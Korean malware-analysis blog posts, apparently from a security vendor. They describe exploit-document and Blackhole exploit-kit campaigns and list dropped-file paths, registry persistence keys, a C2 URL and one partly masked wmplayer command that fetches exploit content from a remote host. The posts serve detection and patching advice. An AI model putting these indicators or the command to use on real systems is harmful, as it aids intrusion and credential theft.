어도비(Adobe)에서는 현지 시각으로 2월 13일 어도비 리더(Reader)와 아크로뱃(Acrobat)에 존재하는 취약점인 CVE-2013-0640 및 CVE-2013-0641를 악용한 타깃 공격(Targeted Attack)이 발생하였음을 보안 권고문 "Security Advisory for Adobe Reader and Acrobat"를 통해 밝혔다.


이 번에 발견된 2개의 어도비 리더와 아크로뱃 취약점은 기존에 알려지지 않은 제로 데이(Zero-Day, 0-Day) 취약점으로 현재까지 해당 취약점들을 제거할 수 있는 보안 패치가 제공되지 않고 있다.


ASEC에서 파악한 바로는 해당 제로 데이 취약점들은 아프가니스탄을 중심으로 한 중동 지역을 대상으로 한 타깃 공격(Targeted Attack) 형태로 이메일의 첨부 파일로 공격이 진행되었다.


어도비에서는 해당 취약점들에 영향을 받는 어도비 리더와 아크로뱃 버전들은 다음과 같음을 밝히고 있다.


윈도우(Windows) 및 맥킨토시(Macintosh) Adobe Reader XI (11.0.01 및 이전 버전)

윈도우(Windows) 및 맥킨토시(Macintosh) Adobe Reader X (10.1.5  및 이전 버전)

윈도우(Windows), 맥킨토시(Macintosh) 및 리눅스(Linux) Adobe Reader 9.5.3 및 이전 버전

윈도우(Windows), 맥킨토시(Macintosh) Adobe Acrobat XI (11.0.01 및 이전 버전)

윈도우(Windows), 맥킨토시(Macintosh)Adobe Acrobat X (10.1.5 및 이전 버전)

윈도우(Windows), 맥킨토시(Macintosh) Adobe Acrobat 9.5.3 및  9.x 버전


이 번에 발견된 해당 제로 데이 취약점들은 어도비 리더 및 아크로뱃에서 XML 처리를 위해 사용되는 "AcroForm.api" 모듈에서 발생하는 힙 스프레이 오버플로우(Heap-spray overflow) 취약점이다.


이 번 어도비 리더와 아크로뱃에 존재하는 제로 데이 취약점들은 이메일의 첨부 파일 형태로 "Visaform Turkey.pdf (828,744 바이트)"라는 파일명으로 공격에 사용되었다.


해당 제로 데이 취약점들을 악용하는 취약한 PDF 파일을 열게 되면 아래 이미지와 동일한 내용을 가지고 있다.



타깃 공격에 사용된 제로 데이 취약점을 악용한 PDF 파일은 아래 이미지와 동일한 구조를 가지고 있으며, 첫 번째 스트림(Stream)에는 D.T (3,644 바이트) 파일이 암호화 되어 있고, 두 번째 스트림에는 L2P.T (366,926 바이트) 파일이 암호화 되어 존재한다.


그리고 아래 이미지와 동일하게 b5h에서부터 해당 취약한 PDF 문서를 여는데 사용한 어도비 리더와 아크로뱃의 버전을 확인하는 코드가 포함되어 있다.



해당 어도비 리더와 아크로뱃의 버전을 확인하는 코드는 다음 버전을 사용 중인지 확인하게 된다.


10.0.1.434

10.1.0.534

10.1.2.45

10.1.3.23

10.1.4.38

10.1.4.38ARA

10.1.5.33

11.0.0.379

11.0.1.36

9.5.0.270

9.5.2.0

9.5.3.305


만약 해당 취약한 PDF를 열었는 어도비 리더 및 아크로뱃이 해당 버전들에 해당 되지 않을 경우에는 아래 오류 메시지를 발생 후 종료하게 된다.



그리고 해당 취약한 PDF 파일은 아래 이미지와 동일하게 6F932h에서부터 난독화된 자바스크립트(Javascript)가 존재한다.



이 번 어도비 리더와 아크로뱃에 존재하는 제로 데이 취약점들을 악용한 공격의 전체적인 구조는 다음 이미지와 동일하다.



해당 제로 데이 취약점을 악용하는 취약한 PDF 파일을 열게 되면, D.T (46,080 바이트)라는 파일명을 가지는 DLL 파일이 다음 경로에 생성된다.


c:\Documents and Settings\[사용자 계정명]\Local Settings\Temp\acrord32_sbx\D.T


생성된 D.T (46,080 바이트)는 다시 L2P.T (453,632 바이트) 파일명을 가지는 DLL 파일을 다음 경로에 생성하게 된다.


c:\Documents and Settings\[사용자 계정명]\Local Settings\Temp\acrord32_sbx\L2P.T


L2P.T (453,632 바이트)는 취약점이 존재하지 않은 정상 PDF 문서인 Visaform Turkey.pdf (77,210 바이트)를 생성하여 해당 취약한 PDF 파일을 열었던 PC 사용자들에게 정상 파일처럼 보이게 만든다.


c:\Documents and Settings\[사용자 계정명]\Local Settings\Temp\Visaform Turkey.pdf


그리고 L2P.T (453,632 바이트)는 외부 네트워크 연결이 가능한지 다음 도메인으로 접속으로 시도한다.


www.google.com/param 


감염된 시스템이 32비트(Bit) 운영체제 또는 64비트(Bit) 운영체제인지를 확인한 후, 32비트 윈도우 운영체제 일 경우에는 LangBar32.dll (250,880 바이트)을 생성하고, 64비트 윈도우 운영체제 일 경우에는 LangBar64.dll (219,648 바이트)를 다음 경로에 생성하게 된다.


c:\documents and settings\[사용자 계정명]\local settings\application data\cache\LangBar32.dll 


C:\Users\[사용자 계졍명]\AppData\Local\cache\LangBar64.dll 


그리고 감염된 시스템이 재부팅하더라도 자동 실행을 위해 레지스트리에 다음과 같은 키 값을 생성하게 된다.


HKEY_CURRENT_USER\Software\Microsoft\CTF\LangBarAddIn\{CLSID}

= C:\Documents and Settings\[사용자 계정]\Local Settings\Application Data\cache\LangBar32.dll


생성된 LangBar32.dll (250,880 바이트) 또는 LangBar64.dll (219,648 바이트)는 다음의 시스템으로 접속을 시도하게 된다.


bolsilloner.es/index.php


접속이 성공하게 될 경우에는 해당 시스템에서 특정 파일들을 다운로드 하여 lbarext32.dll (236,544 바이트)와 lbarhlp32.dll (269,824 바이트) 파일명의 DLL 파일들을 생성하게 된다.


생성된 해당 lbarext32.dll (236,544 바이트)와 lbarhlp32.dll (269,824 바이트)는 감염된 시스템에서 다음 정보들을 수집하여 kmt32.pod에 기록하게 된다.


실행 중인 프로세스 리스트

실행 중인 프로그램의 윈도우 명

사용자가 입력하는 키보드 입력 값


해당 어도비 리더와 아크로뱃에 존재하는 제로 데이 취약점을 악용한 공격은 악성코드 생성 및 악용한 취약점의 형태를 보았을 때 2월 7일 공개된 "어도비 플래쉬 플레이어 CVE-2013-0633 및 CVE-2013-0634 취약점 악용"과 동일한 그룹에 의해 제작되었을 것으로 추정된다.


이 번에 발견된 어도비 리더 및 아크로뱃에 존재하는 제로 데이 취약점을 악용한 악성코드들은 V3 제품 군에서 다음과 같이 진단한다.


PDF/Exploit

Win-Trojan/Itaduke.46080

Win-Trojan/Itaduke.453632

Win-Trojan/Itaduke.250880

Win64-Trojan/Itaduke.219648

Win-Trojan/Itaduke.236544 

Win-Trojan/Itaduke.269824


APT 전문 대응 솔루션인 트러스와쳐(TrusWatcher)에 포함된 DICA(Dynamic Intelligent Content Analysis)에 의해 시그니처 없이 아래와 같이 탐지가 가능하다.


Exploit/PDF.InScript_ZWF


어도비에서는 보안 패치를 배포하기 전까지 다음과 같은 임시 방안을 권고하고 있다. 아래 임시 방안은 윈도우(Windows) XP에 설치되어 있는 영문 어도비 리더를 기준으로 작성 되었다.


1) 어도비 리더 실행 후 상단의 [편집(Edit)] -> [기본 설정(Preferences)]을 클릭한다



2) [보안 고급(Security Enhanced)]를 클릭 후 상단의 [샌드 박스 보호(Sandbox Protections]에서 [제한된 보기(Protected View)]에서 [안전하지 않을 수 있는 위치의 파일(Files from potentially unsafe locations)]에 클릭한다.



앞서 언급한 바와 같이 현재 어도비에서는 해당 취약점들을 제거할 수 있는 보안 패치를 아직 배포하지 않고 있다. 현재 어도비에서는 보안팀 블로그 "Schedule update to Security Advisory for Adobe Reader and Acrobat (APSA13-02)"를 통해 현지 시각으로 2월 18일 보안 패치를 배포를 예정하고 있다.

저작자 표시 비영리 변경 금지
신고
Creative Commons License
Creative Commons License
Posted by 비회원

추석 연휴가 끝난 이후 ASEC에서는 최근 다양한 형태의 전자 문서들에 존재하는 취약점을 악용하는 악성코드들을 발견하였다.


전자 문서와 관련된 악성코드들이 발견되는 것이 이 번이 처음 발생한 사항이 아니지만, 마이크로소프트 워드(Microsoft Word), 한글 소프트웨어 그리고 어도비 리더(Adobe Reader) 파일인 PDF에 존재하는 알려진 취약점 등을 악용하는 악성코드가 동시 다발적으로 발견된 것은 특이 사항으로 볼 수 있다.


먼저 한글 소프트웨어와 관련된 악성코드는 크게 3가지 형태로 기존에 알려진 취약점을 악용하는 형태, 특이하게 내부에 악의적인 목적으로 제작된 자바 스크립트(Java Script)가 포함된 형태 그리고 한글 문서 자체가 특이한 OLE 포맷을 가지고 있는 형태가 발견되었다.


기존에 알려진 한글 취약점을 악용하는 취약한 한글 파일은 아래 이미지와 동일한 내용을 포함하고 있는 "붙임1_국방기술정보 위원명단_[2].hwp (1,061,892 바이트)"로 유포되었다.



해당 취약한 한글 파일은 HncApp.dll에 존재하는 문단 정보를 파싱하는 과정에서 발생하는 버퍼 오버플로우로 인한 임의의 코드 실행 취약점을 악용하고 있으며, 이는 기존에 알려진 취약점으로 이미 한글과 컴퓨터에서 보안 패치를 배포 중에 있다.


두 번째 발견된 취약한 한글 파일은 아래 이미지와 동일하게 문서 암호가 설정되어 있는 "122601.hwp (213,133 바이트)"와 동일 한 파일명에 파일 크기만 217,231 바이트로 다른 파일이 존재한다.


해당 한글 파일들의 내부에는 아래 이미지와 동일한 형태로 특이하게 자바 스크립트(Java Script)가 포함되어 있다.



내부에 포함되어 있는 해당 자바 스크립트 코드를 디코딩하게 되면, 특정 시스템에서 ie67.exe (99,328 바이트)의 다른 악성코드를 다운로드 후 실행하도록 되어 있다.


그리고 마지막으로 아래 이미지와 동일한 내용을 포함하고 있는 "실험 리포트.hwp (7,887,360 바이트)"라는 파이명으로 유포되었으나, 해당 문서를 여는 것만으로는 악성코드 감염 행위가 발생하지 않는다.



해당 한글 파일의 OLE 포맷을 보게되면 아래 이미지와 동일하게 기존에 발견된 특이항 형태의 섹션명이 포함된 한글 파일과 유사한 형태를 가지고 있다.



어도비 아크로뱃(Adobe Acrobat)에 존재하는 알려진 취약점을 악용하는 PDF 파일은 아래 이미지와 동일한 내용을 포함하고 있는 "안보현안분석.pdf  (679,753 바이트)" 파일명으로 유포 되었다.



해당 취약한 PDF 파일은 기존에 알려진 CVE-2009-0927 취약점을 악용하고 있으며, 2009년 3월 어도비에서 보안 권고문 "APSB09-04 Security Updates available for Adobe Reader and Acrobat"을 통해 이미 보안 패치가 배포 중에 있다.


마지막으로 발견된 마이크로소프트 워드에 존재하는 취약점을 악용하는 취약한 워드 파일은 유포 당시의 정확한 파일명은 확인 되지 않지만, 265,395 바이트의 크기를 가지고 있다.


그리고 해당 워드 파일은 CVE-2012-0158 취약점을 악용하며 보안 권고문 "Microsoft Security Bulletin MS12-027 - 긴급 Windows 공용 컨트롤의 취약점으로 인한 원격 코드 실행 문제점 (2664258)" 을 통해 이미 보안 패치가 배포 중인 알려진 취약점이다.


마이크로소프트 워드, 한글 소프트웨어 그리고 어도비 리더에 존재하는 취약점들을 악용하여 악성코드 감염을 시도하는 악성코드들 모두 V3 제품군에서 다음과 같이 진단한다.


HWP/Exploit

Dropper/Exploit-HWP

Dropper/Cve-2012-0158

PDF/Exploit

Backdoor/Win32.PcClient

Dropper/Win32.OnlineGameHack 

Win-Trojan/Infostealer.28672.K

Win-Trojan/Infostealer.81920.B


APT 전문 대응 솔루션인 트러스와쳐(TrusWatcher)에 포함된 DICA(Dynamic Intelligent Content Analysis)에 의해 시그니처 없이 아래와 같이 탐지가 가능하다.


Exploit/HWP.AccessViolation-SEH

Exploit/DOC.AccessViolation-DE


향후 출시 예정인 V3 인터넷 시큐리티(Internet Security) 9.0 에 포함 예정인 ASD 2.0의 MDP 엔진에서도 시그니처 없이 다음과 같이 탐지가 가능하다.


Dropper/MDP.Document


앞서 언급한 바와 같이 이 번에 발견된 취약한 전자 문서 파일들은 모두 기존에 알려진 취약점들을 악용하고 있으며, 마이크로소프트, 한글과 컴퓨터 그리고 어도비에서 모두 해당 취약점들을 제거할 수 있는 보안 패치들을 배포 중에 있다.


그러므로 향후 유사한 보안 위협들로 인한 피해를 예방하기 위해서는 관련 보안 패치를 설치하는 것이 중요하다.

저작자 표시 비영리 변경 금지
신고
Creative Commons License
Creative Commons License
Posted by 비회원

최근 들어 웹 익스플로잇 툴킷(Web Exploit Toolkit)의 일종인 블랙홀(Blackhole) 웹 익스플로잇 툴킷이 스팸 메일(Spam Mail)과 결합되어 유포되는 현상들이 자주 발견되고 있다.


최근 발견된 블랙홀 웹 익스플로잇 툴킷과 스팸 메일이 결합되어 유포된 사례들은 다음을 들 수가 있다.


2012년 6월 - 스팸 메일과 결합된 웹 익스플로잇 툴킷


2012년 7월 - 링크드인 스팸 메일과 결합된 블랙홀 웹 익스플로잇 툴킷


금일 블랙홀 웹 익스플로잇 툴 킷과 결합된 스팸 메일이 다시 발견되었으며, 이 번에 발견된 스팸 메일은 인터넷을 이용한 현금 결제 서비스인 페이팔(PayPal)의 결제 결과 안내 메일로 위장하여 유포되었다.


이 번에 발견된 페이팔 스팸 메일과 결합된 형태로 유포된 블랙홀 웹 익스플로잇 툴킷은 아래 이미지와 같이 다양한 취약점들을 악용하고 있으며 최종적으로 감염된 PC에서 사용자 정보들을 탈취하기 위한 악성코드 감염을 목적으로 하고 있다.



페이팔 결제 안내 메일로 위장해 유포된 스팸 메일은 아래 이미지와 같은 형태를 가지고 있으며, [Accept] 부분은 정상적인 페이팔 웹 페이지로 연결되는 것이 아니라 미국에 위치한 특정 시스템으로 연결되도록 구성되어 있다.



해당 [Accept] 부분을 클릭하게 되면 미국에 위치한 특정 시스템으로 접속하며, PC 사용자에게는 아래와 같은 이미지를 보여주게 된다.



그러나 실제 해당 웹 페이지 하단에는 아래 이미지와 같이 다른 말레이시아에 위치한 시스템으로 연결되는 자바 스크립트 코드가 인코딩 되어 있다.



해당 자바 스크립트 코드를 디코딩하게 되면 기존 블랙홀 익스플로잇 툴킷과 동일한 포맷의 iFrame 으로 처리된 코드가 나타나며, 사용자 모르게 말레이시아에 위치한 블랙홀 웹 익스플로잇 툴킷이 설치되어 있는 시스템으로 연결하게 된다.


그리고 해당 블랙홀 익스플로잇 툴킷에서는 아래의 취약점들 중 하나를 악용하게 된다.



해당 취약점이 성공적으로 악용되면 동일한 시스템에 존재하는 64b3bcf.exe (84,480 바이트)를 다운로드하여 wpbt0.dll (84,480 바이트) 명칭으로 생성하게 된다.


C:\Documents and Settings\[사용자 계정]\Local Settings\Temp\wpbt0.dll


그리고 생성된 wpbt0.dll (84,480 바이트) 는 다시 자신의 복사본을 아래 경로에 KB01458289.exe   (84,480 바이트) 명칭으로 복사하게 된다.


C:\Documents and Settings\[사용자 계정]\Application Data\KB01458289.exe


감염된 PC의 레지스트리에 다음 키 값을 생성하여 PC가 재부팅 할 때마다 자동 실행 되도록 구성하였다.


HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\

KB01458289.exe = C:\Documents and Settings\[사용자 계정]\Application Data\KB01458289.exe


그리고 감염된 PC에서 실행 중인 explorer.exe 정상 프로세스의 스레드로 자신의 코드를 삽입한 후 다음의 정보들을 후킹하게 된다.

웹 사이트 접속 정보
FTP 시스템 접속 사용자 계정과 비밀 번호 정보
POP3 이용 프로그램 사용자 계정과 비밀 번호 정보
웹 폼 변조(Formgrabber) 및 웹 폼 인젝션 (httpinjects)으로 웹 사이트 사용자 계정과 암호 정보

마지막으로 감염된 PC 사용자에게는 구글 메인 웹 페이지로 연결하여 정상적인 접속이 실패한 것으로 위장하게 된다.

이 번에 발견된 페이팔 스팸 메일과 결합된 블랙홀 웹 익스플로잇 툴킷에서 유포한 악성코드들은 V3 제품군에서 모두 다음과 같이 진단한다.

JS/Iframe
JS/Redirect
PDF/Cve-2010-0188
Win-Trojan/Agent.84480.HA

페이팔 스팸 메일과 결합된 블랙홀 웹 익스플로잇 툴킷에서 유포를 시도한 악성코드는 기존에 발견된 온라인 뱅킹 정보 탈취를 목적으로하는 제우스(Zeus) 또는 스파이아이(SpyEye)와 유사한 웹 폼 변조(Formgrabber) 및 웹 폼 인젝션 (httpinjects) 기능으로 웹 사이트 사용자 계정과 암호 정보를 탈취 할 수 있다.

이는 악성코드 유포자가 의도하는 대부분의 웹 사이트들에서 사용자 계정과 비밀 번호 정보를 탈취 할 수 있음으로, 단순 스팸 메일로 판단되더라도 송신자가 불명확한 메일에 포함된 웹 사이트 연결 링크를 클릭하지 않는 주의가 필요하다.

저작자 표시 비영리 변경 금지
신고
Creative Commons License
Creative Commons License
Posted by 비회원

ASEC에서는 6월 5일 웹 익스플로잇 툴킷(Web Exploit Toolkit)의 일종인 블랙홀(Blackhole) 웹 익스플로잇 툴 킷이 스팸 메일(Spam Mail)과 결합되어 유포되었다는 사실을 밝힌 바가 있다.


금일 블랙홀 웹 익스플로잇 툴 킷과 결합된 스팸 메일이 다시 발견되었으며, 이 번에 발견된 스팸 메일은 사용자가 많은 유명 소셜 네트워크(Social Network) 서비스인 링크드인(LinkedIn)의 초대 메일로 위장하여 유포되었다.


이 번에 발견된 링크드인 스팸 메일과 결합된 형태로 유포된 블랙홀 웹 익스플로잇 툴킷은 아래 이미지와 같이 다양한 취약점들을 악용하고 있으며 최종적으로 감염된 PC에서 사용자 정보들을 탈취하기 위한 악성코드 감염을 목적으로 하고 있다.



링크드인의 초대 메일로 위장해 유포된 스팸 메일은 아래 이미지와 같은 형태를 가지고 있으며, [Accept] 부분은 정상적인 링크드인 웹 페이지로 연결되는 것이 아니라 중국에 위치한 특정 시스템으로 연결되도록 구성되어 있다.



해당 [Accept] 부분을 클릭하게 되면 중국에 위치한 특정 시스템으로 접속하며, PC 사용자에게는 아래와 같은 이미지를 보여주게 된다.



그러나 실제 해당 웹 페이지 하단에는 아래 이미지와 같이 웹 페이지 하단에는 다른 러시아에 위치한 시스템으로 연결되는 자바 스크립트 코드가 인코딩 되어 있다.



해당 자바 스크립트 코드를 디코딩하게 되면 아래 이미지와 같이 iFrame 으로 처리된 코드가 나타나며, 사용자 모르게 러시아에 위치한 블랙홀 웹 익스플로잇 툴킷이 설치되어 있는 시스템으로 연결하게 된다.



해당 블랙홀 웹 익스플로잇 툴킷에 성공적으로 연결하게 되면 웹 브라우저에 의해 CMD 명령으로 윈도우 미디어 플레이(Windows Media Player) 취약점을 악용하기 위한 시도를 하게 된다. 그러나 분석 당시 해당 취약점은 정상적으로 악용되지 않았다.


"C:\Program Files\Windows Media Player\wmplayer.exe" /open http://************.ru:8080/forum/data/hcp_asx.php?f=182b5"


그리고 두 번째로 자바(JAVA)와 인터넷 익스플로러(Internet Explorer)에 존재하는 알려진 취약점을 악용하기 위한 스크립트 파일이 실행된다.



세 번째로 어도비 아크로뱃 리더(Adobe Acrobat Reader)에 존재하는 알려진 취약점을 악용하기 위한 PDF 파일을 아래 이미지와 같이 다운로드 후 실행 하게 된다.



해당 링크드인 스팸 메일을 수신한 PC에 위에서 언급한 4개의 취약점 중 하나라도 존재 할 경우에는 동일한 시스템에서 wpbt0.dll (127,648 바이트)를 다운로드하여 다음 경로에 생성하게 된다.


C:\Documents and Settings\Tester\Local Settings\Temp\wpbt0.dll


그리고 생성된 wpbt0.dll (127,648 바이트) 는 다시 자신의 복사본을 아래 경로에 KB01458289.exe (127,648 바이트)라를 명칭으로 복사하게 된다.


C:\Documents and Settings\Tester\Application Data\KB01458289.exe


감염된 PC의 레지스트리에 다음 키 값을 생성하여 PC가 재부팅 할 때마다 자동 실행 되도록 구성하였다.


HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\

KB01458289.exe = C:\Documents and Settings\Tester\Application Data\KB01458289.exe


그리고 감염된 PC에서 실행 중인 모든 정상 프로세스의 스레드로 자신의 코드 일부분을 삽입한 후 다음의 정보들을 후킹하게 된다.


웹 사이트 접속 정보

FTP 시스템 접속 사용자 계정과 비밀 번호 정보

POP3 이용 프로그램 사용자 계정과 비밀 번호 정보

웹 폼 변조(Formgrabber) 및 웹 폼 인젝션 (httpinjects)으로 웹 사이트 사용자 계정과 암호 정보


감염된 PC에서 수집된 정보들 모두는 아래 이미지와 같이 악성코드 내부에 하드코딩 되어 있는 특정 시스템들으로 후킹한 데이터들 전부를 인코딩하여 전송하게 된다.



그리고 마지막으로 감염된 PC 사용자에게는 아래 웹 페이지와 같이 연결을 시도한 웹 페이지를 보여주어 정상적인 접속이 실패한 것으로 위장하게 된다.



이 번에 발견된 링크드인 스팸 메일과 결합된 블랙홀 웹 익스플로잇 툴킷에서 유포한 악성코드들은 V3 제품군에서 모두 다음과 같이 진단한다.


JS/Iframe

Packed/Win32.Krap

PDF/Exploit
JS/Exploit

링크드인 스팸 메일과 결합된 블랙홀 웹 익스플로잇 툴킷에서 유포를 시도한 악성코드는 기존에 발견된 온라인 뱅킹 정보 탈취를 목적으로하는 제우스(Zeus) 또는 스파이아이(SpyEye)와 유사한 웹 폼 변조(Formgrabber) 및 웹 폼 인젝션 (httpinjects) 기능으로 웹 사이트 사용자 계정과 암호 정보를 탈취 할 수 있다.


이는 악성코드 유포자가 의도하는 대부분의 웹 사이트들에서 사용자 계정과 비밀 번호 정보를 탈취 할 수 있음으로, 단순 스팸 메일로 판단되더라도 송신자가 불명확한 메일에 포함된 웹 사이트 연결 링크를 클릭하지 않는 주의가 필요하다.

저작자 표시
신고
Creative Commons License
Creative Commons License
Posted by 비회원
안철수연구소 ASEC에서 2012년 1월 국내,외에서 발생한 다양한 보안 위협 이슈와 동향들을 정리한 ASEC 리포트 2011 Vol.25을 발간하였다. 


이 번에 발간된 ASEC 리포트는 2012년 1월 주요 보안 위협 이슈들을 다음과 같이 분석하고 있다.

MS12-004 윈도우 미디어 취약점을 악용한 악성코드 유포
스페이스와 탭을 이용한 자바스크립트 난독화 소스 출현
보안 제품의 업데이트를 방해하는 Hosts 파일 변경 악성코드 주의
내 하드디스크가 타버린다고? 불안심리를 자극하는 Hoax 악성코드
단축 URL을 이용해 트위터로 유포 중인 피싱 웹사이트
악성코드 버그로 인한 “응용 프로그램 초기화 오류”와 BSOD(Hard Disk) 발생
MADDEN NFL 12 로 위장한 악성 애플리케이션
일본 성인사이트에서 유포되는 악성 애플리케이
Hash Collision 공격을 통한 웹 서버 서비스 거부 공격(DoS)
HP LaserJet  펌웨어 관련 치명적 보안 취약점 발견

이 외에 악성코드 분석 특집으로 "모바일 악성코드 동향"을 포함하고 있다.
 

안철수연구소 ASEC에서 발간하는 월간 보안 위협 동향 리포트는 아래 웹 사이트에서 확인 할 수 있다 

ASEC 보안 위협 동향 리포트 2011 Vol.25
저작자 표시
신고
Creative Commons License
Creative Commons License
Posted by 비회원
ASEC에서는 1월 27일 MS12-004 윈도우 미디어 취약점(CVE-2012-0003)을 악용한 악성코드 유포가 발견되었으며, 마이크로소프트(Microsoft)에서 1월 11일 배포한 보안 패치로 해당 취약점을 제거 할 수 있음을 공개하였다. 

그리고 해당 취약점을 악용한 악성코드는 한국과 중국을 포함한 극동 아시아 권을 주된 대상으로 유포된 것으로 분석하였으며, 최종적으로는 온라인 게임 관련 정보들을 탈취하기 위한 것음을 밝힌 바가 있다.

2월 2일 국내 웹 사이트에서 Heap Feng Shui라는 기법을 이용해 제작된 새로운 형태의 MS12-004 취약점 악용 스크립트 악성코드 변형이 발견되었다. 

이 번에 새롭게 발견된 해당 스크립트 악성코드는 ASEC에서 추가적인 조사 과정에서 1월 30일 경에 제작되어 유포가 진행 된 것으로 추정하고 있다.

Heap Feng Shui라는 기법을 이용해 제작된 새로운 형태의 스크립트 악성코드는 아래와 같은 전체적인 구조를 가지고 있다.


Heap Feng Shui는 2007년 Black Hat Europe에서 최초로 발표된 기법으로 순차적인 자바 스크립트(Java Script) 할당을 통해 브라우저(Browser)에서 힙(Heap) 영역을 다루게 된다.

 
해당 MS12-004 취약점을 악용하는 스크립트는 yty.mid 파일을 호출하도록 되어 있으나, 아래 이미지와 같이 손상된 MIDI 파일이 존재하여 실질적인 공격이 성공하지는 않을 것으로 분석하고 있다.


이 번에 발견된 해당 스크립트 악성코드의 쉘코드(Shellcode)에서는 국내에 위치한 특정 시스템에서 i.exe(20,480 바이트)를 다운로드 한 후 실행 하도록 되어 있다.

다운로드 후 실행 되는 i.exe는 비주얼 베이직(Visual Basic)으로 제작되었으며 국내에서 제작된 특정 온라인 게임의 사용자 정보 탈취와 함께 특정 ASP 파일을 읽어오도록 되어 있다.

현재까지 새로운 MS12-004 취약점 악용 스크립트 변형은 주말 사이에 총 72건이 V3에서 진단 된 것으로 미루어 해당 스크립트 악성코드는 향후 온라인 게임 관련 악성코드와 함께 지속적으로 유포될 것으로 예측 된다.

그러므로 사용하는 윈도우(Windows) 운영체제에 대한 최신 보안 패치를 설치하는 것이 악성코드 감염을 예방하는 원천적인 방법이다.

Heap Feng Shui 기법을 이용해 제작된 MS12-004 취약점을 악용하는 스크립트 악성코드와 관련된 악성코드들은 V3 제품군에서 모두 다음과 같이 진단한다.

Downloader/Win32.Small
HTML/Ms12-004
Exploit/Ms12-004
JS/Redirector
SWF/Cve-2011-2140
JS/Cve-2010-0806
저작자 표시
신고
Creative Commons License
Creative Commons License
Posted by 비회원

자바스크립트 소스를 이용하여 악성코드를 심는 방법은 일반화 된지 오래 되었다. 특히 악성코드 제작자들은 자바스크립트 소스를 분석하기 어렵게 만들기 위한 난독화 과정을 거쳐, 백신제품의 엔진에 반영하기 어렵게 하고 있다. 지금까지는 주로 문자열 인코딩 방식을 ASCII 코드가 아닌 다른 방식을 이용하여 알아보기 힘들게 만들었다.

그러나 이번에 새롭게 등장한 방식은 이러한 틀에서 벗어난 방식이다. 화면에 난독화 코드로 보이는 부분이 존재하지 않고, 다만 커다란 빈 공간이 많이 보인다.


그림 1 최근 한 언론사 홈페이지에 삽입되었던 소스코드


보기에는 공백으로 보이지만 실제 커서 위치시켜 이동시켜 보면 스페이스와 탭이 섞여 있는 것을 확인할 수 있다. 보다 정확한 확인을 위해 HEX 값을 확인해 보면 그림 2와 같음을 확인할 수 있다.

그림 2 해당 소스코드의 HEX값 확인 결과


스페이스와 탭의 아스키 코드 값은 16진수로 각각 20 09이다. 따라서 위와 같이 표현된 코드의 경우 스페이스와 탭을 2진수 표현 값으로 이용한 것으로 추론 가능하다.
 

사실 이러한 방법은 빌리 호프만(Billy Hoffman)[각주:1]이 이미 2008 Blackhat 보안 컨퍼런스에서 Circumventing Automated JavaScript Analysis”라는 주제로 발표할 당시 언급한 적이 있다. (발표자료 다운로드) 다만, 발표 당시에는 Crazy Idea (“현실적으로 불가능한 아이디어이라는 의미)로 소개되었으나 실제 코드가 발견되었다는 것이 중요하다.

 

그림 3 2008 Blackhat 컨퍼런스에서 발표된 실제 발표자료


위의 자료를 보면 스페이스는 1, 탭은 0을 의미한다. 탭과 스페이스로 구성된 코드는 다양한 방법으로 난독화를 해제할 수 있다. 스페이스와 탭을 각각 1 0으로 고쳐서 직접 계산하고 표에서 찾는 방법이 있고, 간단한 프로그램을 작성하여 분석하는 방법도 있다. 또한 별도의 툴을 이용하지 않고, 브라우저만 이용하는 방법을 이용하여 분석하는 방법이 있다.

먼저 소스코드를 보기 좋게 정렬한다. 화면에 스페이스와 탭만 출력되어서는 악성페이지를 불러올 수 없다. 분명 스페이스와 탭을 복호화 하는 코드가 포함되어 있을 것이다. 스페이스와 탭 코드 바로 윗 부분에, 빌리 호프만의 발표자료에 있던 복호화 코드와 동일한 소스가 있는 것을 확인할 수 있다.

그림 4 디코딩 함수 정의, 호출 부분, 호출시 전달인자는 난독화 된 코드이다.


그림 4는 난독화된 부분과 복호화 코드만 남겨두고 정상인 부분은 제거한 것이다. 스페이스와 탭으로 구성된 난독화 된 문자열이 복호화 함수로 전달되어 복호화 될 것이다.  실제 복호화 된 코드를 출력해보면 그림 5와 같다. (상세 결과는 모자이크 처리)

그림 5 복호화시 출력 결과


출력결과에서 알 수 있듯이 일부 메시지는 HEX값으로 되어 있는 것을 알 수 있다. 다시 난독화 해제를 해주면 실제 호출하고자 하는 파일의 주소를 확인할 수 있다.

그림 6 최종 호출하는 파일의 주소


그림 6과 같이 연결하고자 하는 악성코드 유포페이지로 유도하는 주소와 코드를 확인할 수 있다. 현재 해당 URL은 접속되지 않는 것으로 보아 제작자에 의해 폐쇄된 것으로 보인다.

이러한 악성코드가 동작하거나 감염되는 것을 막기 위해서 다음과 같은 조치를 취해야 한다.

<개인>

1. 백신 프로그램의 경우 최신버전의 엔진을 사용한다.

 

2. 윈도우 XP의 경우 SP 버전 등을 확인하여 최신버전을 설치하여 사용하고, 미설치된 보안업데이트가 있을 경우 모두 설치한다.

3. IE 8.0 이상의 브라우저를 사용하거나 타사 브라우저를 사용한다.

http://update.microsoft.com/microsoftupdate/v6/default.aspx?ln=ko

위 링크 이동 후, 서비스팩 및 IE 업데이트 설치 진행

 

4. Flash Player를 비롯한 ActiveX 프로그램들은 최신 버전을 설치한다.

http://get.adobe.com/kr/flashplayer/
위 링크 이동 후, "지금 다운로드" 클릭하여 설치 진행
(
추가 프로그램 설치를 원치 않을시엔 선택사항 체크 해제 하신 후 다운로드 클릭)

5. 최근에 많이 이용되는 Java 취약점을 보완하기 위해 최신 버전의 Java 프로그램을 설치한다.

http://www.java.com/ko/
위 링크 이동 후 "무료 자바 다운로드" 클릭하여 설치 진행

 

<기업 보안관리자>

1. 백신 프로그램의 경우 최신버전의 엔진을 사용한다.

 

2. 부득이한 경우를 최소화하고, 보안업데이트 및 최신 윈도우 서비스팩를 설치한다.

 

3. 부득이한 경우를 최소화하고, IE8 버전 이상을 사용한다.

 

4. 추가 응용프로그램들의 업데이트는 아래 글을 참고한다.

http://asec.ahnlab.com/758

 

 

 

  1. Acidus라는 닉네임으로 잘 알려진 미국 해커. 前 SPI Dynamics 연구원(웹보안 연구기업). 前 HP 웹보안 연구그룹 연구원. 現 Zoompf 설립자 겸 대표 (웹보안컨설팅 회사) [본문으로]
신고
Creative Commons License
Creative Commons License
Posted by 곰탱이푸우

http://core.ahnlab.com/193


상기의 이전 글에서 최근 html 파일을 첨부하거나 html 링크를 삽입한 스팸메일을 통해 악성코드를 다운로드 하는 스팸메일의 형태를 살펴보았습니다. 

